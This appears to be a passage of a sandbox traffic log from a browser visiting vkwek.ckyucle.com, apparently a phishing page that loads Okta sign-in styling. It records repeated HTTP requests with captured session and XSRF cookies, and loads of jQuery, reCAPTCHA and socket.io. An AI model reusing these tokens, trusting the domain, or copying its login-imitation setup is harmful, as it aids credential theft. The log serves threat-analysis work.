Source: global traffic	HTTP traffic detected: GET /pqJEZxAGJZqUBhc85R9yzrCUwx40 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /yzBt71gp856BSdkJ4Qop47 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /78l8NmRVxJ45fjuJRst60 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /45TplGCNDXCptZb896Wyz84jpQxy69 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=64710-64710If-Range: "28feccc0-15d9d"
Source: global traffic	HTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fent/randexp.js/releases/download/v0.4.3/randexp.min.js HTTP/1.1Host: github.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=64710-89500If-Range: "28feccc0-15d9d"
Source: global traffic	HTTP traffic detected: GET /github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240703%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240703T073932Z&X-Amz-Expires=300&X-Amz-Signature=aca7c6b73d5e3c084a388576b46174841ccd1d5d20df0b47f08acd7640c141a5&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ef6ywsH6ValAwIHzgds78wUwuLf89smkl92 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://vkwek.ckyucle.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
Source: global traffic	HTTP traffic detected: GET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1Host: vkwek.ckyucle.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
